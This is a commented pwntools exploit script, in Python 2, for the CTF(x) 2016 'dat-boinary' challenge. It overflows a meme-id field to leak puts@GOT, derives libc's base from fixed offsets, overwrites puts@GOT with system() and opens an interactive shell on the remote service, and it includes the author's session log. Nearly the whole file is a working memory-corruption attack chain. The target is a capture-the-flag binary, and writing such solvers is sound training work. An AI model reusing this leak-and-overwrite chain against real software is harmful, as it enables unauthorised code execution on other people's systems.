Last active
September 14, 2016 13:53
CTF(x) 2016 dat-boinary
#!/usr/bin/python2
# CTF(x) 2016 "dat-boinary" solver (pwntools, Python 2).
#
# Flow, as far as this file shows: overflow the meme-id field ("smash"),
# use the service's own menu to read the value stored at puts@GOT, derive
# the libc base from a hard-coded offset, write system()'s address back
# over puts@GOT, and then trigger a code path that goes through that slot.
#
# Sample session output recorded by the author:
# [+] Opening connection to 172.28.128.3 on port 1338: Done
# [*] Smash null byte
# [*] Reading from memory
# [*] Leaked puts@glibc at 0xb7665650
# [*] system@glibc is at 0xb7640190
# [*] Overwriting puts@got with system@glibc
# [*] Triggering
# [*] Switching to interactive mode
from pwn import *

# Target is 32-bit x86 Linux. The p32()/u32() calls below pack/unpack
# 4-byte values; their byte order follows this context (little-endian for
# i386), so keep the two in sync.
context.update(arch='i386', os='linux')
def smash(r):
    """Answer the intro prompts and send an over-long meme id.

    The author's log calls this step "Smash null byte": the id is answered
    with 9 bytes, presumably one more than the field holds, so that the
    terminator of an adjacent value is overwritten. The field size is not
    visible in this file -- TODO confirm against the binary.

    Args:
        r: pwntools tube connected to the challenge service.
    """
    r.recvuntil("Before we start, please give your meme an id")
    r.send('a'*9)  # send(), not sendline(): exactly 9 bytes, no newline
    r.recvuntil("What would you like to do?")
    r.recvuntil("==> ")
    r.sendline('')  # empty menu choice first, then option 5
    r.sendline('5')
    r.recvuntil('\nsecret')  # drain the reply up to the "secret" line
    return
def read_from_memory(r, addr):
    """Return what the service prints after the meme id is pointed at *addr*.

    Menu option 1 sets the meme id. The id payload puts p32(addr) at offset
    12 (12 'A's before it, 7 'B's after); judging by main, where this call
    yields the value stored at puts@GOT, that overwrites the pointer which
    option 4 ("show content") dereferences. The actual field layout is not
    visible here -- confirm against the binary before reusing the offsets.

    Args:
        r: pwntools tube, positioned before a "==> " menu prompt.
        addr: 32-bit address to read from.

    Returns:
        The raw bytes printed after 'Ur meme c0nT3nT:\\t', up to and
        including the next '==> ' prompt. The caller slices the leaked
        value out of this (main takes the first 4 bytes).
    """
    r.recvuntil("==> ")
    r.sendline('1')
    r.recvuntil('3nt3r ur m3m3 id')
    r.sendline('A'*12 + p32(addr) + 'B'*7)  # 12 + 4 + 7 = 23 bytes plus newline
    r.sendline('4')  # sent without waiting for the next prompt
    r.recvuntil('Ur meme c0nT3nT:\t')
    return r.recvuntil('==> ')
def write_in_memory(r, addr, data):
    """Store *data* at *addr* through the same meme-id pointer corruption.

    Sequence: option 1 re-points the meme id at *addr* (same 12/4/7 payload
    layout as read_from_memory), option 2 sets the content size to
    len(data)+1 (the extra byte presumably accounts for a terminator --
    not verifiable from this file), option 3 then stores *data* as the
    content.

    Unlike read_from_memory, this does not wait for a "==> " prompt before
    sending '1'; it relies on the caller having already consumed that
    prompt (in main, read_from_memory's return value ends exactly there).
    Calling it from any other conversation state will desynchronise the
    exchange.

    Args:
        r: pwntools tube.
        addr: 32-bit destination address.
        data: bytes to store; main passes p32(system_addr).
    """
    r.sendline('1')
    r.recvuntil('3nt3r ur m3m3 id')
    r.sendline('A'*12 + p32(addr) + 'B'*7)
    r.recvuntil("==> ")
    r.sendline('2')
    r.recvuntil('3nt3r teh d4nkn3ess 0f m3me')
    r.sendline(str(len(data)+1))
    r.recvuntil("==> ")
    r.sendline('3')
    r.sendline(data)  # no prompt is awaited between '3' and the payload
    return
if __name__ == "__main__":
    # Address of puts' GOT entry in the challenge binary. A fixed value
    # like this only works if the binary is loaded at a constant address
    # (no PIE); it was hard-coded by the author for this challenge build.
    puts_got = 0x8049118
    r = remote("172.28.128.3", 1338)
    # r = remote("problems.ctfx.io", 1338)
    log.info("Smash null byte")
    smash(r)
    log.info("Reading from memory")
    data = read_from_memory(r, puts_got)
    # Assumes the leaked value is the first thing in the reply and that at
    # least 4 bytes came back; u32() raises on a shorter slice, so a
    # failed leak surfaces here as an unpacking error rather than a
    # clear message.
    puts_leak = u32(data[0:4])
    log.info("Leaked puts@glibc at %#x" % puts_leak)
    # 0x65650 and 0x40190 are the offsets of puts and system inside the
    # libc build used by the challenge service (determined by the author);
    # they are specific to that libc and must be re-derived for any other.
    libc_base = puts_leak - 0x65650
    system_addr = libc_base + 0x40190
    log.info("system@glibc is at %#x" % system_addr)
    log.info("Overwriting puts@got with system@glibc")
    write_in_memory(r, puts_got, p32(system_addr))
    log.info("Triggering")
    r.recvuntil('==>')  # note: no trailing space here, unlike the helpers
    # Option 5 again; with puts@GOT now holding system's address, whatever
    # this path hands to puts() is executed by system() instead. What that
    # argument is cannot be seen from this file.
    r.sendline('5')
    r.recvuntil('whaddup!')
    r.interactive()